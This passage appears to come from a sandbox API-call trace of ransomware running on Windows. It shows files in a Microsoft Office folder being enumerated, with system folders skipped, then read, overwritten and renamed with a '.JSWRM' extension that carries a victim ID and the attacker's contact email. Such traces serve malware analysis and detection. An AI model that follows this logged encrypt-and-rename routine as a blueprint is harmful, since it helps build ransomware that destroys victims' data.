lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0140.987] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0140.987] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGCAL.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgcal.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0140.988] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=218216) returned 1 [0140.988] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.988] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0140.999] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.000] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0141.000] CloseHandle (hObject=0x238) returned 1 [0141.000] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGCAL.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgcal.dpv"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGCAL.DPV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgcal.dpv.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0141.001] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc702687, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcc702687, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcc7288ca, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1e66, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="DGCAL.XML", cAlternateFileName="")) returned 1 [0141.001] lstrcmpiW (lpString1="DGCAL.XML", lpString2=".") returned 1 [0141.001] lstrcmpiW (lpString1="DGCAL.XML", lpString2="..") returned 1 [0141.001] lstrcmpiW (lpString1="DGCAL.XML", lpString2="...") returned 1 [0141.002] lstrcmpiW (lpString1="DGCAL.XML", lpString2="windows") returned -1 [0141.002] lstrcmpiW (lpString1="DGCAL.XML", lpString2="recovery") returned -1 [0141.002] lstrcmpiW (lpString1="DGCAL.XML", lpString2="perflogs") returned -1 [0141.002] lstrcmpiW (lpString1="DGCAL.XML", lpString2="documents and settings") returned -1 [0141.002] lstrcmpiW (lpString1="DGCAL.XML", lpString2="$RECYCLE.BIN") returned 1 [0141.002] lstrcmpiW (lpString1="DGCAL.XML", lpString2="system volume information") returned -1 [0141.002] lstrcmpiW (lpString1="DGCAL.XML", lpString2="msocache") returned -1 [0141.002] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGCAL.XML", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0141.002] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGCAL.XML", cchWideChar=9, lpMultiByteStr=0x345ebd8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGCAL.XML", lpUsedDefaultChar=0x0) returned 9 [0141.002] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGCAL.XML", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0141.002] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGCAL.XML", cchWideChar=9, lpMultiByteStr=0x345eba8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGCAL.XML", lpUsedDefaultChar=0x0) returned 9 [0141.002] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.002] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0141.002] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGCAL.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgcal.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0141.003] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7782) returned 1 [0141.003] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.003] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x1e60, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x1e60, lpOverlapped=0x0) returned 1 [0141.005] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.005] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x1e60, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x1e60, lpOverlapped=0x0) returned 1 [0141.006] CloseHandle (hObject=0x238) returned 1 [0141.006] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGCAL.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgcal.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGCAL.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgcal.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0141.007] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x21994fc3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x21994fc3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x21994fc3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="DGCHKBRD.DPV", cAlternateFileName="")) returned 1 [0141.007] lstrcmpiW (lpString1="DGCHKBRD.DPV", lpString2=".") returned 1 [0141.007] lstrcmpiW (lpString1="DGCHKBRD.DPV", lpString2="..") returned 1 [0141.007] lstrcmpiW (lpString1="DGCHKBRD.DPV", lpString2="...") returned 1 [0141.007] lstrcmpiW (lpString1="DGCHKBRD.DPV", lpString2="windows") returned -1 [0141.007] lstrcmpiW (lpString1="DGCHKBRD.DPV", lpString2="recovery") returned -1 [0141.007] lstrcmpiW (lpString1="DGCHKBRD.DPV", lpString2="perflogs") returned -1 [0141.007] lstrcmpiW (lpString1="DGCHKBRD.DPV", lpString2="documents and settings") returned -1 [0141.007] lstrcmpiW (lpString1="DGCHKBRD.DPV", lpString2="$RECYCLE.BIN") returned 1 [0141.007] lstrcmpiW (lpString1="DGCHKBRD.DPV", lpString2="system volume information") returned -1 [0141.007] lstrcmpiW (lpString1="DGCHKBRD.DPV", lpString2="msocache") returned -1 [0141.007] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGCHKBRD.DPV", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0141.007] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGCHKBRD.DPV", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGCHKBRD.DPV", lpUsedDefaultChar=0x0) returned 12 [0141.007] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGCHKBRD.DPV", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0141.007] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGCHKBRD.DPV", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGCHKBRD.DPV", lpUsedDefaultChar=0x0) returned 12 [0141.007] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.007] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0141.007] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGCHKBRD.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgchkbrd.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0141.008] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4096) returned 1 [0141.008] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.008] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0x1000, lpOverlapped=0x0) returned 1 [0141.010] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.010] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0x1000, lpOverlapped=0x0) returned 1 [0141.010] CloseHandle (hObject=0x238) returned 1 [0141.010] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGCHKBRD.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgchkbrd.dpv"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGCHKBRD.DPV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgchkbrd.dpv.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0141.011] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc68ff65, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcc68ff65, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcc702687, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x29e, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="DGCHKBRD.XML", cAlternateFileName="")) returned 1 [0141.011] lstrcmpiW (lpString1="DGCHKBRD.XML", lpString2=".") returned 1 [0141.011] lstrcmpiW (lpString1="DGCHKBRD.XML", lpString2="..") returned 1 [0141.011] lstrcmpiW (lpString1="DGCHKBRD.XML", lpString2="...") returned 1 [0141.011] lstrcmpiW (lpString1="DGCHKBRD.XML", lpString2="windows") returned -1 [0141.011] lstrcmpiW (lpString1="DGCHKBRD.XML", lpString2="recovery") returned -1 [0141.011] lstrcmpiW (lpString1="DGCHKBRD.XML", lpString2="perflogs") returned -1 [0141.011] lstrcmpiW (lpString1="DGCHKBRD.XML", lpString2="documents and settings") returned -1 [0141.011] lstrcmpiW (lpString1="DGCHKBRD.XML", lpString2="$RECYCLE.BIN") returned 1 [0141.011] lstrcmpiW (lpString1="DGCHKBRD.XML", lpString2="system volume information") returned -1 [0141.011] lstrcmpiW (lpString1="DGCHKBRD.XML", lpString2="msocache") returned -1 [0141.011] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGCHKBRD.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0141.011] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGCHKBRD.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGCHKBRD.XML", lpUsedDefaultChar=0x0) returned 12 [0141.012] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGCHKBRD.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0141.012] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGCHKBRD.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGCHKBRD.XML", lpUsedDefaultChar=0x0) returned 12 [0141.012] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.012] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0141.012] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGCHKBRD.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgchkbrd.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0141.012] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=670) returned 1 [0141.012] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.013] ReadFile (in: hFile=0x238, lpBuffer=0x20e9d0, nNumberOfBytesToRead=0x290, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20e9d0*, lpNumberOfBytesRead=0x345e89c*=0x290, lpOverlapped=0x0) returned 1 [0141.014] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.014] WriteFile (in: hFile=0x238, lpBuffer=0x20e9d0*, nNumberOfBytesToWrite=0x290, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20e9d0*, lpNumberOfBytesWritten=0x345e898*=0x290, lpOverlapped=0x0) returned 1 [0141.014] CloseHandle (hObject=0x238) returned 1 [0141.015] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGCHKBRD.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgchkbrd.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGCHKBRD.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgchkbrd.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0141.016] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc68ff65, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcc68ff65, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcc7288ca, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x49e, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="DGCINFO.XML", cAlternateFileName="")) returned 1 [0141.017] lstrcmpiW (lpString1="DGCINFO.XML", lpString2=".") returned 1 [0141.017] lstrcmpiW (lpString1="DGCINFO.XML", lpString2="..") returned 1 [0141.017] lstrcmpiW (lpString1="DGCINFO.XML", lpString2="...") returned 1 [0141.017] lstrcmpiW (lpString1="DGCINFO.XML", lpString2="windows") returned -1 [0141.017] lstrcmpiW (lpString1="DGCINFO.XML", lpString2="recovery") returned -1 [0141.017] lstrcmpiW (lpString1="DGCINFO.XML", lpString2="perflogs") returned -1 [0141.017] lstrcmpiW (lpString1="DGCINFO.XML", lpString2="documents and settings") returned -1 [0141.017] lstrcmpiW (lpString1="DGCINFO.XML", lpString2="$RECYCLE.BIN") returned 1 [0141.017] lstrcmpiW (lpString1="DGCINFO.XML", lpString2="system volume information") returned -1 [0141.017] lstrcmpiW (lpString1="DGCINFO.XML", lpString2="msocache") returned -1 [0141.017] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGCINFO.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0141.017] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGCINFO.XML", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGCINFO.XML", lpUsedDefaultChar=0x0) returned 11 [0141.017] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGCINFO.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0141.017] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGCINFO.XML", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGCINFO.XML", lpUsedDefaultChar=0x0) returned 11 [0141.017] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.017] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0141.017] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGCINFO.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgcinfo.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0141.018] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1182) returned 1 [0141.018] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.018] ReadFile (in: hFile=0x238, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x490, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e89c*=0x490, lpOverlapped=0x0) returned 1 [0141.020] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.020] WriteFile (in: hFile=0x238, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x490, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e898*=0x490, lpOverlapped=0x0) returned 1 [0141.020] CloseHandle (hObject=0x238) returned 1 [0141.020] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGCINFO.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgcinfo.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGCINFO.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgcinfo.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0141.021] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x21994fc3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x21994fc3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x219bb1e1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6082, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="DGCOUPON.DPV", cAlternateFileName="")) returned 1 [0141.022] lstrcmpiW (lpString1="DGCOUPON.DPV", lpString2=".") returned 1 [0141.022] lstrcmpiW (lpString1="DGCOUPON.DPV", lpString2="..") returned 1 [0141.022] lstrcmpiW (lpString1="DGCOUPON.DPV", lpString2="...") returned 1 [0141.022] lstrcmpiW (lpString1="DGCOUPON.DPV", lpString2="windows") returned -1 [0141.022] lstrcmpiW (lpString1="DGCOUPON.DPV", lpString2="recovery") returned -1 [0141.022] lstrcmpiW (lpString1="DGCOUPON.DPV", lpString2="perflogs") returned -1 [0141.022] lstrcmpiW (lpString1="DGCOUPON.DPV", lpString2="documents and settings") returned -1 [0141.022] lstrcmpiW (lpString1="DGCOUPON.DPV", lpString2="$RECYCLE.BIN") returned 1 [0141.022] lstrcmpiW (lpString1="DGCOUPON.DPV", lpString2="system volume information") returned -1 [0141.022] lstrcmpiW (lpString1="DGCOUPON.DPV", lpString2="msocache") returned -1 [0141.022] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGCOUPON.DPV", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0141.022] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGCOUPON.DPV", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGCOUPON.DPV", lpUsedDefaultChar=0x0) returned 12 [0141.022] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGCOUPON.DPV", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0141.022] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGCOUPON.DPV", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGCOUPON.DPV", lpUsedDefaultChar=0x0) returned 12 [0141.022] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.022] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0141.022] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGCOUPON.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgcoupon.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0141.023] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=24706) returned 1 [0141.023] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.023] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x6080, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x6080, lpOverlapped=0x0) returned 1 [0141.026] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.026] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x6080, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, 